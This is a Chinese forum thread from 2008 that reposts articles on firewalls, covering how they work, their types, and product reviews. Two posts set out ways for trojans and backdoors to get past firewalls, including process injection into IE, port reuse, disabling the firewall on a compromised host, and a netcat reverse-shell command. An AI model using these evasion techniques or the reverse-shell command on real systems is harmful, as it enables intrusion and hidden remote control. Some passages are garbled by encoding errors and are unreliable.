论坛风格切换
 
  • 帖子
  • 日志
  • 用户
  • 版块
  • 群组
帖子
购买邀请后未收到邀请联系sdbeta@qq.com
  • 17027阅读
  • 22回复

防火墙文章整理 [复制链接]

上一主题 下一主题
离线深水易寒
 

发帖
2098
今日发帖
最后登录
2020-02-27
只看楼主 倒序阅读 使用道具 楼主  发表于: 2008-03-25 10:42:50
1楼:解读防火墙
2楼:5种方法逃过防火墙控制系统的研究
3楼:防火墙:功夫到七层
4楼:解析木马如何穿过你的防火墙
5楼:世界上最优秀的二十款防火墙简介
6楼:TCP/IP网络的信息安全与防火墙技术
7楼:防火墙封阻应用攻击的八项技术
8楼:如何突破各种防火墙的防护
9楼:解读Windows XP SP2防火墙
10楼:谁更安全--黑客眼中的防火墙与路由器
11楼:Linux 防火墙配置基础篇
12楼:关注防火墙技术新动向
13楼:防火墙的来历及应用现状
14楼:通杀国内一些防火墙技巧
15楼:一篇关于防火墙的冲突的文章
16楼:精通网络个人防火墙问与答
17楼:精解解读防火墙记录
18楼:推荐:绝对值得一看的杀毒软件和防火墙评论
19楼:黑客我不怕 Outpost防火墙应用技巧攻略
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 沙发  发表于: 2008-03-25 10:43:12
解读防火墙

一. 防火墙的概念
  近年来,随着普通计算机用户群的日益增长,“防火墙”一词已经不再是服务器领域的专署,大部分家庭用户都知道为自己爱机安装各种“防火墙”软件了。但是,并不是所有用户都对“防火墙”有所了解的,一部分用户甚至认为,“防火墙”是一种软件的名称……
  到底什么才是防火墙?它工作在什么位置,起着什么作用?查阅历史书籍可知,古代构筑和使用木制结构房屋的时候为防止火灾的发生和蔓延,人们将坚固的石块堆砌在房屋周围作为屏障,这种防护构筑物就被称为“防火墙”(FireWall)。时光飞梭,随着计算机和网络的发展,各种攻击入侵手段也相继出现了,为了保护计算机的安全,人们开发出一种能阻止计算机之间直接通信的技术,并沿用了古代类似这个功能的名字——“防火墙”技术来源于此。用专业术语来说,防火墙是一种位于两个或多个网络间,实施网络之间访问控制的组件集合。对于普通用户来说,所谓“防火墙”,指的就是一种被放置在自己的计算机与外界网络之间的防御系统,从网络发往计算机的所有数据都要经过它的判断处理后,才会决定懿荒馨颜庑┦?萁桓?扑慊??坏┓⑾钟泻κ?荩?阑鹎骄突崂菇叵吕矗?迪至硕约扑慊?谋;すδ堋?br />  防火墙技术从诞生开始,就在一刻不停的发展着,各种不同结构不同功能的防火墙,构筑成网络上的一道道防御大堤。


二. 防火墙的分类
  世界上没有一种事物是唯一的,防火墙也一样,为了更有效率的对付网络上各种不同攻击手段,防火墙也派分出几种防御架构。根据物理特性,防火墙分为两大类,硬件防火墙和软件防火墙。软件防火墙是一种安装在负责内外网络转换的网关服务器或者独立的个人计算机上的特殊程序,它是以逻辑形式存在的,防火墙程序跟随系统启动,通过运行在Ring0级别的特殊驱动模块把防御机制插入系统关于网络的处理部分和网络接口设备驱动之间,形成一种逻辑上的防御体系。
  在没有软件防火墙之前,系统和网络接口设备之间的通道是直接的,网络接口设备通过网络驱动程序接口(Network Driver Interface Specification,NDIS)把网络上传来的各种报文都忠实的交给系统处理,例如一台计算机接收到请求列出机器上所有共享资源的数据报文,NDIS直接把这个报文提交给系统,系统在处理后就会返回相应数据,在某些情况下就会造成信息泄漏。而使用软件防火墙后,尽管NDIS接收到仍然的是原封不动的数据报文,但是在提交到系统的通道上多了一层防御机制,所有数据报文都要经过这层机制根据一定的规则判断处理,只有它认为安全的数据才能到达系统,其他数据则被丢弃。因为有规则提到“列出共享资源的行为是危险的”,因此在防火墙的判断下,这个报文会被丢弃,这样一来,系统接收不到报文,则认为什么事情也没发生过,也就不会把信息泄漏出去了。
  软件防火墙工作于系统接口与NDIS之间,用于检查过滤由NDIS发送过来的数据,在无需改动硬件的前提下便能实现一定强度的安全保障,但是由于软件防火墙自身属于运行于系统上的程序,不可避免的需要占用一部分CPU资源维持工作,而且由于数据判断处理需要一定的时间,在一些数据流量大的网络里,软件防火墙会使整个系统工作效率和数据吞吐速度下降,甚至有些软件防火墙会存在漏洞,导致有害数据可以绕过它的防御体系,给数据安全带来损失,因此,许多企业并不会考虑用软件防火墙方案作为公司网络的防御措施,而是使用看得见摸得着的硬件防火墙。
  硬件防火墙是一种以物理形式存在的专用设备,通常架设于两个网络的驳接处,直接从网络设备上检查过滤有害的数据报文,位于防火墙设备后端的网络或者服务器接收到的是经过防火墙处理的相对安全的数据,不必另外分出CPU资源去进行基于软件架构的NDIS数据检测,可以大大提高工作效率。
  硬件防火墙一般是通过网线连接于外部网络接口与内部服务器或企业网络之间的设备,这里又另外派分出两种结构,一种是普通硬件级别防火墙,它拥有标准计算机的硬件平台和一些功能经过简化处理的UNIX系列操作系统和防火墙软件,这种防火墙措施相当于专门拿出一台计算机安装了软件防火墙,除了不需要处理其他事务以外,它毕竟还是一般的操作系统,因此有可能会存在漏洞和不稳定因素,安全性并不能做到最好;另一种是所谓的“芯片”级硬件防火墙,它采用专门设计的硬件平台,在上面搭建的软件也是专门开发的,并非流行的操作系统,因而可以达到较好的安全性能保障。但无论是哪种硬件防火墙,管理员都可以通过计算机连接上去设置工作参数。由于硬件防火墙的主要作用是把传入的数据报文进行过滤处理后转发到位于防火墙后面的网络中,因此它自身的硬件规格也是分档次的,尽管硬件防火墙已经足以实现比较高的信息处理效率,但是在一些对数据吞吐量要求很高的网络里,档次低的防火墙仍然会形成瓶颈,所以对于一些大企业而言,芯片级的硬件防火墙才是他们的首选。
  有人也许会这么想,既然PC架构的防火墙也不过如此,那么购买这种防火墙还不如自己找技术人员专门腾出一台计算机来做防火墙方案了。虽然这样做也是可以的,但是工作效率并不能和真正的PC架构防火墙相比,因为PC架构防火墙采用的是专门修改简化过的系统和相应防火墙程序,比一般计算机系统和软件防火墙更高度紧密集合,而且由于它的工作性质决定了它要具备非常高的稳定性、实用性和非常高的系统吞吐性能,这些要求并不是安装了多网卡的计算机就能简单替代的,因此PC架构防火墙虽然是与计算机差不多的配置,价格却相差很大。
  现实中我们往往会发现,并非所有企业都架设了芯片级硬件防火墙,而是用PC架构防火墙甚至前面提到的计算机替代方案支撑着,为什么?这大概就是硬件防火墙最显著的缺点了:它太贵了!购进一台PC架构防火墙的成本至少都要几千元,高档次的芯片级防火墙方案更是在十万元以上,这些价格并非是小企业所能承受的,而且对于一般家庭用户而言,自己的数据和系统安全也无需专门用到一个硬件设备去保护,何况为一台防火墙投入的资金足以让用户购买更高档的电脑了,因而广大用户只要安装一种好用的软件防火墙就够了。
  为防火墙分类的方法很多,除了从形式上把它分为软件防火墙和硬件防火墙以外,还可以从技术上分为“包过滤型”、“应用代理型”和“状态监视”三类;从结构上又分为单一主机防火墙、路由集成式防火墙和分布式防火墙三种;按工作位置分为边界防火墙、个人防火墙和混合防火墙;按防火墙性能分为百兆级防火墙和千兆级防火墙两类……虽然看似种类繁多,但这只是因为业界分类方法不同罢了,例如一台硬件防火墙就可能由于结构、数据吞吐量和工作位置而规划为“百兆级状态监视型边界防火墙”,因此这里主要介绍的是技术方面的分类,即“包过滤型”、“应用代理型”和“状态监视型”防火墙技术。
  那么,那些所谓的“边界防火墙”、“单一主机防火墙”又是什么概念呢?所谓“边界”,就是指两个网络之间的接口处,工作于此的防火墙就被称为“边界防火墙”;与之相对的有“个人防火墙”,它们通常是基于软件的防火墙,只处理一台计算机的数据而不是整个网络的数据,现在一般家庭用户使用的软件防火墙就是这个分类了。而“单一主机防火墙”呢,就是我们最常见的一台台硬件防火墙了;一些厂商为了节约成本,直接把防火墙功能嵌进路由设备里,就形成了路由集成式防火墙……


三. 防火墙技术
  传统意义上的防火墙技术分为三大类,“包过滤”(Packet Filtering)、“应用代理”(Application Proxy)和“状态监视”(Stateful Inspection),无论一个防火墙的实现过程多么复杂,归根结底都是在这三种技术的基础上进行功能扩展的。

1.包过滤技术
  包过滤是最早使用的一种防火墙技术,它的第一代模型是“静态包过滤”(Static Packet Filtering),使用包过滤技术的防火墙通常工作在OSI模型中的网络层(Network Layer)上,后来发展更新的“动态包过滤”(Dynamic Packet Filtering)增加了传输层(Transport Layer),简而言之,包过滤技术工作的地方就是各种基于TCP/IP协议的数据报文进出的通道,它把这两层作为数据监控的对象,对每个数据包的头部、协议、地址、端口、类型等信息进行分析,并与预先设定好的防火墙过滤规则(Filtering Rule)进行核对,一旦发现某个包的某个或多个部分与过滤规则匹配并且条件为“阻止”的时候,这个包就会被丢弃。适当的设置过滤规则可以让防火墙工作得更安全有效,但是这种技术只能根据预设的过滤规则进行判断,一旦出现一个没有在设计人员意料之中的有害数据包请求,整个防火墙的保护就相当于摆设了。也许你会想,让用户自行添加不行吗?但是别忘了,我们要为是普通计算机用户考虑,并不是所有人都了解网络协议的,如果防火墙工具出现了过滤遗漏问题,他们只能等着被入侵了。一些公司采用定期从网络升级过滤规则的方法,这个创意固然可以方便一部分家庭用户,但是对相对比较专业的用户而言,却不见得就是好事,因为他们可能会有根据自己的机器环境设定和改动的规则,如果这个规则刚好和升级到的规则发生冲突,用户就该郁闷了,而且如果两条规则冲突了,防火墙该听谁的,会不会当场“死给你看”(崩溃)?也许就因为考虑到这些因素,至今我没见过有多少个产品会提供过滤规则更新功能的,这并不能和杀毒软件的病毒特征库升级原理相提并论。为了解决这种鱼与熊掌的问题,人们对包过滤技术进行了改进,这种改进后的技术称为“动态包过滤”(市场上存在一种“基于状态的包过滤防火墙”技术,即Stateful-based Packet Filtering,他们其实是同一类型),与它的前辈相比,动态包过滤功能在保持着原有静态包过滤技术和过滤规则的基础上,会对已经成功与计算机连接的报文传输进行跟踪,并且判断该连接发送的数据包是否会对系统构成威胁,一旦触发其判断机制,防火墙就会自动产生新的临时过滤规则或者把已经存在的过滤规则进行修改,从而阻止该有害数据的继续传输,但是由于动态包过滤需要消耗额外的资源和时间来提取数据包内容进行判断处理,所以与静态包过滤相比,它会降低运行效率,但是静态包过滤已经几乎退出市场了,我们能选择的,大部分也只有动态包过滤防火墙了。
  基于包过滤技术的防火墙,其缺点是很显著的:它得以进行正常工作的一切依据都在于过滤规则的实施,但是偏又不能满足建立精细规则的要求(规则数量和防火墙性能成反比),而且它只能工作于网络层和传输层,并不能判断高级协议里的数据是否有害,但是由于它廉价,容易实现,所以它依然服役在各种领域,在技术人员频繁的设置下为我们工作着。

2.应用代理技术
  由于包过滤技术无法提供完善的数据保护措施,而且一些特殊的报文攻击仅仅使用过滤的方法并不能消除危害(如SYN攻击、ICMP洪水等),因此人们需要一种更全面的防火墙保护技术,在这样的需求背景下,采用“应用代理”(Application Proxy)技术的防火墙诞生了。我们的读者还记得“代理”的概念吗?代理服务器作为一个为用户保密或者突破访问限制的数据转发通道,在网络上应用广泛。我们都知道,一个完整的代理设备包含一个服务端和客户端,服务端接收来自用户的请求,调用自身的客户端模拟一个基于用户请求的连接到目标服务器,再把目标服务器返回的数据转发给用户,完成一次代理工作过程。那么,如果在一台代理设备的服务端和客户端之间连接一个过滤措施呢?这样的思想便造就了“应用代理”防火墙,这种防火墙实际上就是一台小型的带有数据检测过滤功能的透明代理服务器(Transparent Proxy),但是它并不是单纯的在一个代理设备中嵌入包过滤技术,而是一种被称为“应用协议分析”(Application Protocol Analysis)的新技术。
  “应用协议分析”技术工作在OSI模型的最高层——应用层上,在这一层里能接触到的所有数据都是最终形式,也就是说,防火墙“看到”的数据和我们看到的是一样的,而不是一个个带着地址端口协议等原始内容的数据包,因而它可以实现更高级的数据检测过程。整个代理防火墙把自身映射为一条透明线路,在用户方面和外界线路看来,它们之间的连接并没有任何阻碍,但是这个连接的数据收发实际上是经过了代理防火墙转向的,当外界数据进入代理防火墙的客户端时,“应用协议分析”模块便根据应用层协议处理这个数据,通过预置的处理规则(没错,又是规则,防火墙离不开规则)查询这个数据是否带有危害,由于这一层面对的已经不再是组合有限的报文协议,甚至可以识别类似于“GET /sql.asp?id=1 and 1”的数据内容,所以防火墙不仅能根据数据层提供的信息判断数据,更能像管理员分析服务器日志那样“看”内容辨危害。而且由于工作在应用层,防火墙还可以实现双向限制,在过滤外部网络有害数据的同时也监控着内部网络的信息,管理员可以配置防火墙实现一个身份验证和连接时限的功能,进一步防止内部网络信息泄漏的隐患。最后,由于代理防火墙采取是代理机制进行工作,内外部网络之间的通信都需先经过代理服务器审核,通过后再由代理服务器连接,根本没有给分隔在内外部网络两边的计算机直接会话的机会,可以避免入侵者使用“数据驱动”攻击方式(一种能通过包过滤技术防火墙规则的数据报文,但是当它进入计算机处理后,却变成能够修改系统设置和用户数据的恶意代码)渗透内部网络,可以说,“应用代理”是比包过滤技术更完善的防火墙技术。
  但是,似乎任何东西都不可能逃避“墨菲定律”的规则,代理型防火墙的结构特征偏偏正是它的最大缺点,由于它是基于代理技术的,通过防火墙的每个连接都必须建立在为之创建的代理程序进程上,而代理进程自身是要消耗一定时间的,更何况代理进程里还有一套复杂的协议分析机制在同时工作,于是数据在通过代理防火墙时就不可避免的发生数据迟滞现象,换个形象的说法,每个数据连接在经过代理防火墙时都会先被请进保安室喝杯茶搜搜身再继续赶路,而保安的工作速度并不能很快。代理防火墙是以牺牲速度为代价换取了比包过滤防火墙更高的安全性能,在网络吞吐量不是很大的情况下,也许用户不会察觉到什么,然而到了数据交换频繁的时刻,代理防火墙就成了整个网络的瓶颈,而且一旦防火墙的硬件配置支撑不住高强度的数据流量而发生罢工,整个网络可能就会因此瘫痪了。所以,代理防火墙的普及范围还远远不及包过滤型防火墙,而在软件防火墙方面更是几乎没见过类似产品了——单机并不具备代理技术所需的条件,所以就目前整个庞大的软件防火墙市场来说,代理防火墙很难有立足之地。

3.状态监视技术
  这是继“包过滤”技术和“应用代理”技术后发展的防火墙技术,它是CheckPoint技术公司在基于“包过滤”原理的“动态包过滤”技术发展而来的,与之类似的有其他厂商联合发展的“深度包检测”(Deep Packet Inspection)技术。这种防火墙技术通过一种被称为“状态监视”的模块,在不影响网络安全正常工作的前提下采用抽取相关数据的方法对网络通信的各个层次实行监测,并根据各种过滤规则作出安全决策。
  “状态监视”(Stateful Inspection)技术在保留了对每个数据包的头部、协议、地址、端口、类型等信息进行分析的基础上,进一步发展了“会话过滤”(Session Filtering)功能,在每个连接建立时,防火墙会为这个连接构造一个会话状态,里面包含了这个连接数据包的所有信息,以后这个连接都基于这个状态信息进行,这种检测的高明之处是能对每个数据包的内容进行监视,一旦建立了一个会话状态,则此后的数据传输都要以此会话状态作为依据,例如一个连接的数据包源端口是8000,那么在以后的数据传输过程里防火墙都会审核这个包的源端口还是不是8000,否则这个数据包就被拦截,而且会话状态的保留是有时间限制的,在超时的范围内如果没有再进行数据传输,这个会话状态就会被丢弃。状态监视可以对包内容进行分析,从而摆脱了传统防火墙仅局限于几个包头部信息的检测弱点,而且这种防火墙不必开放过多端口,进一步杜绝了可能因为开放端口过多而带来的安全隐患。
  由于状态监视技术相当于结合了包过滤技术和应用代理技术,因此是最先进的,但是由于实现技术复杂,在实际应用中还不能做到真正的完全有效的数据安全检测,而且在一般的计算机硬件系统上很难设计出基于此技术的完善防御措施(市面上大部分软件防火墙使用的其实只是包过滤技术加上一点其他新特性而已)。


四. 技术展望
  防火墙作为维护网络安全的关键设备,在目前采用的网络安全的防范体系中,占据着举足轻重的位置。伴随计算机技术的发展和网络应用的普及,越来越多的企业与个体都遭遇到不同程度的安全难题,因此市场对防火墙的设备需求和技术要求都在不断提升,而且越来越严峻的网络安全问题也要求防火墙技术有更快的提高,否则将会在面对新一轮入侵手法时束手无策。
  多功能、高安全性的防火墙可以让用户网络更加无忧,但前提是要确保网络的运行效率,因此在防火墙发展过程中,必须始终将高性能放在主要位置,目前各大厂商正在朝这个方向努力,而且丰富的产品功能也是用户选择防火墙的依据之一,一款完善的防火墙产品,应该包含有访问控制、网络地址转换、代理、认证、日志审计等基础功能,并拥有自己特色的安全相关技术,如规则简化方案等,明天的防火墙技术将会如何发展,让我们拭目以待。
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 板凳  发表于: 2008-03-25 10:43:35
5种方法逃过防火墙控制系统的研究

随着木马,后门的不停发展,防火墙本身也在不断地发展,这是一个矛和盾和关系,知道如何逃过防火墙对于控制一台系统是有很重大的意义的。

由于防火墙的发展,时至今天,很多防火墙都是以驱动形式加载的,核心部分是在驱动那里,保留一个界面给用户去设置,这个界面程序同时充当了桥梁作用,传统的杀防火墙进程以达到能控制到系统的方法已经是失效的了,而且这也不是一个好的方法(想想管理员发现防火墙的图标不见了会有什么反应).以下是谈谈以种方法。

前提条件:

1.你在远程系统有足够权限

2.你已从ipc或mssql或其它得到系统的权限,但因为无论用ipc还是用mssql的操作,都并不如直接得到一个cmd的Shell操作来得快和方便


方法1:不让防火墙加载自己

使用各类工具,pslist,sc.exe,reg.exe等去查找防火墙在哪里加载的,如果是在run中那加载的话,用reg.exe将其删除;如果是服务启动,用sc.exe 将服务改为手动或禁止,然后重启那系统,这样系统重启后防火墙就无法加载自己了。这种方法不让防火墙运行,比较容易被管理员发现。

方法2:强行绑入防火墙允许的端口

一台系统,如果有一些服务,如pcanywhere,sev-u,iis,mssql,mysql等的话,防火墙总要允许这些应用程序打开的端口被外界所连接的,而这些应用程序打开的端口是可以被后门或木马程序自身打开的端口重新强行绑入的。例如pcnayhwere打开端口或serv-u打开的端口都可以被重新绑入,iis和mssql等就有时可以,但有时会失败,原因不明。 由于那些应用程序是得到防火墙的授权并信任的,所以后门或木马将绑口强行绑入后,是可以避开防火墙的,但这种方法对于那些比较高级的防火墙,如Zonealarm等,还是不行的,因为Zonealarm不只是监视端口,而且监视是什么程序尝试去绑入某个端口的,如果后门没得到Zonealarm授权的话,一样是无法绑入那个端口的。

方法3:icmp协议或自定义协议的后门或木马

对于一些防火墙是有效果的,但是如果防火墙是检测有网络连接的程序是不是防火墙信任的,那么这个方法就会失效,因为这类防火墙允不允许程序连接网络是根据用户是否让那程序连接的,而并不是单单看协议或端口。

方法4:将后门或木马插到其它进程中运行

系统中某些程序,99.9999%的用户都会允许的,象IE,如果有用户不允许IE连接网络的话,那是很稀见的。因为IE一般都是防火墙信任的应用程序,所以只要将后门程序插入到IE中运行,那么防火墙一般是不会拦的。只要防火墙允许IE连接网络,那么插入到IE中运行的后门就可以接受外界的连接了。这类后门一般是以Dl加载进去IE运行的,直接一个可执行程序将一个线程注入IE运行也可以,但远没有将DLL注入那么稳定。这种方法可以避开大部份的防火墙,但对于一些不但会检查out bound,而且会检查in bound连接的防火墙会有时失效。但总的来说,这算是一种很好和方便的方法(已经过测试).

方法5:将后门插入到IE中运行,并且使用反向连接

上面方法4已说明了IE一般是防火墙信任的应用程序,所以将后门插入到IE中运行已是一个好方法了,由于某些防火墙还会检查in bound连接(从外界连入系统的连接),是会导致方法4失效的,因为防火墙是可能通知用户是否允许这个连接的,只要用户拒绝,那么方法4就失效了。

但如果将后门插到IE中运行,并且让后门自动向外界一个指定的IP中连接(反向连接),这样的话,几乎99%是会成功的,因为防火墙是已允许IE向外连接的了,所以一旦后门连接上那个指定的IP,攻击者就可以得到一个cmd下的Shell.

上面所说的几种方法中,方法1,2,3应用面是很窄的,而且并不能算是一种好的方法;方法4,5是比较高级的方法,而且管理员一般很难发现(一般不会有人会怀疑自己的IE被人插入后门在运行的,相信大部份上网用户不会知道有这些方法的),而且这些方法比较难检测出来
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 地板  发表于: 2008-03-25 10:43:58
防火墙:功夫到七层

在短短的几年里,防火墙的功能重心从网络层发展到了应用层。本文结合Microsoft ISA Server的发展,阐述了这种变迁的技术背景,以及未来的防火墙技术走向。

应用层攻击挑战传统防火墙

最近两年来,攻击者的兴趣明显从端口扫描和制造拒绝服务攻击(DoS Attack)转向了针对Web、E-mail甚至数据库等主流应用的攻击。传统的防火墙仅仅检查IP数据包的包头,而忽略了内容——如果用信件来做比喻,也就是只检查了信封而没有检查信纸。因此对这类应用层的攻击无能为力。可以说,仅仅靠第三层和第四层的IP地址和协议端口过滤的防火墙产品早已走到了尽头。

战火烧向七层

为了对抗应用层(OSI网络模型的第七层)的攻击,防火墙必须具备应用层的过滤能力,Microsoft ISA Server 2004等防火墙产品已经具备了这种能力。

如果把计算机网络比做一座建筑,传统的包过滤防火墙就是在企业内部网络和Internet之间的一系列并列的门。每道门都有安检人员对到达的包裹(IP数据包)进行逐一检查,若没有发现数据包含有异常代码便开门放行。攻击者常用的伎俩就是通过端口扫描来检查哪些门是敞开不设防的,然后加以利用。晚些时候出现的具有状态检测δ艿姆阑鹎娇梢约觳槟男┦?莅?抢醋訧nternet对内部网络访问请求的应答。也就是说,安检人员能够鉴别那些不请自来的包裹。

但应用层攻击就要复杂得多,因为攻击数据包在绝大多数情况下是合法的数据包,不同的只是内容具有攻击性,而且因为IP数据包是分段传输的,其内容的判别需要将所有相关的包重组后才能准确进行。一旦这种攻击数据包通过了防火墙,它们通常会开始有条不紊地利用目标系统的漏洞制造缓冲区溢出,获得系统的控制权,然后以此为平台开始寻找周围其他系统的漏洞或者其他的蠕虫留下的后门,进而展开攻击。

防火墙的对策

对此,Microsoft ISA Server 2004采取的应对措施是,针对每一类主流的应用, HTTP、SMTP、FTP和SQL Server数据库访问(基于RPC)都设置专门的过滤器,如果未来出现新的应用层威胁,还可以增加相应的过滤器。用户可以针对每一种过滤器进行应用相关的过滤设置,例如,可以通过限制任何HTTP访问请求的缓冲区不得超过3000个字节来防止一些蠕虫的攻击。在这种新的机制下,来自Internet的数据包被发送到各自的过滤器,过滤器会将数据包重组后进行内容扫描和判别。拿一封邮件来说,SMTP过滤器会等待相关的包到齐后,在转发之前重组邮件对其内容进行扫描,与已知类型的攻击进行比对,在确认这是正常流量后才允许通过。

经过正确配置的现代防火墙可以阻挡绝大多数已知的病毒邮件和攻击代码。虽然阻挡未知的病毒和攻击要困难得多,但是经过合理的策略设置通常是有效的。正确设置策略的基础是企业用户对于自身业务需求的正确理解,例如,多数企业的用户通常是没有必要通过邮件来传递可执行文件和Visual Basic脚本代码的。用户可以通过阻断含有这类可执行附件的邮件来对付一些未知的病毒。一旦真的需要发送这类文件,也可以设置更有针对性的策略,比如只允许IT部门的用户发送含有可执行文件附件邮件,或者允许用户接收除含有名为“Kournikova.jpg.vbs”的脚本附件之外的所有邮件。

安全与性能的矛盾  

用户早已习惯于把安全性和性能看成是对立的,就像在机场的安检入口,检查的步骤越多,等待安检的队伍也就越长。对于防火墙来说,性能和安全的确是一对永远的矛盾,但是应用层过滤的功能对防火墙性能的影响并没有多数用户想象得那么大,Microsoft ISA Server 2004标称每秒钟可处理超过1000个并发用户,同时保持每会话(session)27Mbps的吞吐量。事实上,有些厂商通过硬件(ASIC)实现应用层的过滤引擎,能够达到更加接近线速(可理解为以太网交换机的处理极限)的处理能力。

新的挑战

具有应用层过滤功能的防火墙可以更有效地阻挡当前多数病毒和攻击程序,但新的安全威胁的不断出现又对防火墙提出了新的挑战。攻击的来源正在变得更加复杂,而攻击的手段也愈加高明,最近垃圾邮件与攻击代码的结合就是一个典型的例证。这一方面需要防火墙设备对于应用层的内容有更好的认知和智能判别的能力,另一方面也需要防火墙更多地与其他的安全设备和应用有效配合,从而实现更加有力的防护。
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 地下室  发表于: 2008-03-25 10:44:27
解析木马如何穿过你的防火墙?

网络不太平,谁上网都会架起个firewall来防护网络攻击
这岂不是给我们木马的生存带来了巨大挑战?
物竞天择,适者生存,嗯...要想生存下去就要穿墙! Bypass Firewall:

1.首先就是No Firewall(允许本地对外监听基本上任何端口),没有防火墙?(这不是废话?)
对付这种机器好办,随便哪个马一般都行
典型代表 Radmin(其实它不是马,用的人多了,也就变成了马,无辜)
rdp 3389/tcp (远程桌面,它也不是马,不过你不用,还有谁用呢?)

2.端口筛选(只允许外部连接特定端口,也就是外部对特定端口发起syn连接请求才被接受,从而完成三次握手,建立连接,否则防火墙丢弃数据包,无法完成握手,无法建立连接,也就是木马不能随意开个端口就监听了)
道高一尺,魔高一丈.:
你不让我连你,我就让你连我呗, 反弹端口技术诞生了(一般防火墙对本地发起的syn连接请求不会拦截)
使用工具netcat就可以穿刺这种防火墙 :
nc -e cmd.exe 远程ip 远程监听port
将会反弹一个cmdshell给远程ip主机控制,,这种方式好就好在可以控制没有公网ip的受害主机.

随后,端口复用技术也出现了,复用防火墙开放的端口:如80,21,445等
典型的后门如hkdoor,ntrookit(作者都是国人yyt_hac )
还有利用无端口协议来通信,如利用icmp报文,(Ping就是利用的ICMP协议的 Echo Request和Echo Reply探测主机存活)
典型的如pingdoor (Ping由于使用icmp报文,根本不开放端口,端口筛选也就无可奈何了,但是icmp并无差错控制,所以这种后门的传输特性也并不理想,除非自己加上差错控制)
更牛的,就是干脆抛开TCP/IP协议,木马自定义协议进行通信,你防火墙能把我怎么样?哈哈
典型的如ntrootkit采用了自定义协议技术.

3.应用程序筛选.(只允许特定程序访问网络)
木马也不甘落后,自己不能访问网络,只好寄人篱下:
进程插入技术诞生了,通常firewall都要允许iexplore.exe,explore.exe,svchost.exe,services.exe等程序访问网络,于是木马便盯上了这些程序.插入...插入再插入
现在的远程控制一般都是插入进程式,一是隐蔽(没有自己进程),二是穿墙.典型如Bits.dll(替换系统服务BITS,插入svchost.exe中) 和灰鸽子/PcShare(默认插入iexplorer.exe浏览器进程)等.

4.协议筛选.
(例如,只允许80端口通过http协议,这样那些端口复用的后门没有使用http协议,不幸被防火墙拒之门外.:-)
怎么办? 暗渡陈仓, 挖隧道: http-tunnel (http隧道)将木马通信封装成http数据报进行传输.
使用这种技术的有pcshare(使用双向http隧道传输)

5.IP过滤,一般就是化分为本机,局域网,广域网三个层次,不过木马也不是吃素的,有些木马已经开始智能化了:
比如,无法连到黑客主机或者跳板,就搜索本机的代理设置,如IE代理设置,然后代理出去!
可以想象P2P形式的马也将于不久以后成为可能,这样木马和僵尸网络的区别就更小了 呵呵

6. 现在很多防火墙都可以检测传输的敏感信息,如用户口令等,所以抗IDS,抗自动分析,这便成了高级木马需要考虑的东西,换句话说保护黑客控制的安全性和隐秘性.典型的解决方法就是采取加密措施,如最简单的对付IDS检测的方法,xor异或加密.

但是现在的防护墙肯定不是以上技术的分离,而是一定有多项技术同时采用.
同时,综合利用以上对抗技术的木马也不鲜见了.
木马和防护墙 永远是一对矛盾,彼此斗争,彼此发展.呵呵
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 5 发表于: 2008-03-25 10:44:48
世界上最优秀的二十款防火墙简介

1.ZoneAlarm(ZA)——强烈推荐◆◆◆◆◆

这是Zone Labs公司推出的一款防火墙和安全防护软件套装,除了防火墙外,它包括有一些个人隐私保护工具以及弹出广告屏蔽工具。与以前的 版本相比,新产品现在能够支持专家级的规则制定,它能够让高级用户全面控制网络访问权限,同时还具有一个发送邮件监视器,它将会 监视每一个有可能是由于病毒导致的可疑行为,另外,它还将会对网络入侵者的行动进行汇报。除此之外,ZoneAlarm Pro 4.5还保留了前几个版本易于使用的特点,即使是刚刚出道的新手也能够很容易得就掌握它的使用。

说明:

1、安装程序会自动查找已安装的 ZoneAlarm Pro 路径。

2、如果已经安装过该语言包,再次安装前请先退出 ZA。否则安装后需要重新启动。

2、若尚未安装 ZA,在安装完 ZA 后进行设置前安装该语言包即可,这样以后的设置将为中文界面。

3、ZA 是根据当前系统的语言设置来选择相应语言包的,如果系统语言设置为英文,则不会调用中文语言包。

4、语言包不改动原版任何文件,也适用于和 4.5.594.000 相近的版本。如果需要,在卸载后可还原到英文版。

5、有极少量英文资源在语言包里没有,故无法汉化。如检查升级时的提示窗口、警报信息中的“Port”。

2.傲盾(KFW)——强烈推荐◆◆◆◆◆

本软件是具有完全知识版权的防火墙,使用了目前最先进的第三代防火墙技术《DataStream Fingerprint Inspection》数据流指纹检测技术,与企业级防火墙Check Point和Cisco相同,能够检测网络协议中所有层的状态,有效阻止DoS、DDoS等各种攻击,保护您的服务器免受来自I nternet上的黑客和入侵者的攻击、破坏。通过最先进的企业级防火墙的技术,提供各种企业级功能,功能强大、齐全,价格低廉 ,是目前世界上性能价格比最高的网络防火墙产品。

3.Kaspersky Anti-Hacker(KAH)——一般推荐◆◆◆◆

Kaspersky Anti-Hacker 是Kaspersky 公司出品的一款非常优秀的网络安全防火墙!和著名的杀毒软件 AVP是同一个公司的作品!保护你的电脑不被黑客攻击和入侵,全方位保护你的数据安全!所有网络资料存取的动作都会经由它对您产 生提示,存取动作是否放行,都由您来决定,能够抵挡来自于内部网络或网际网络的黑客攻击!

4.BlackICE◆◆◆

该软件在九九年获得了PC Magazine 的技术卓越大奖,专家对它的评语是:“对于没有防火墙的家庭用户来说,BlackICE是一道不可缺少的防线;而对于企业网络, 它又增加了一层保护措施--它并不是要取代防火墙,而是阻止企图穿过防火墙的入侵者。BlackICE集成有非常强大的检测和分析引擎,可以识别200 多种入侵技巧,给你全面的网络检测以及系统防护,它还能即时监测网络端口和协议,拦截所有可疑的网络入侵,无论黑客如何费尽心机 也无法危害到你的系统。而且它还可以将查明那些试图入侵的黑客的NetBIOS(WINS)名、DNS名或是他目前所使用的IP 地址记录下来,以便你采取进一步行动。封言用过后感觉,该软件的灵敏度和准确率非常高,稳定性也相当出色,系统资源占用率极少, 是每一位上网朋友的最佳选择。

新增功能:

1.在设置中增加了应用程序与通信控制的功能条

2.可控制应用程序是否在电脑上执行

3.可控制哪些应用程序能与Internet通讯

4.扫描你的系统,检测所有的系统设置改变

5.可在事件列表中记录新软件与新通讯事件的发生情况

5.Agnitum Outpost Firewall(AOFW)◆◆◆

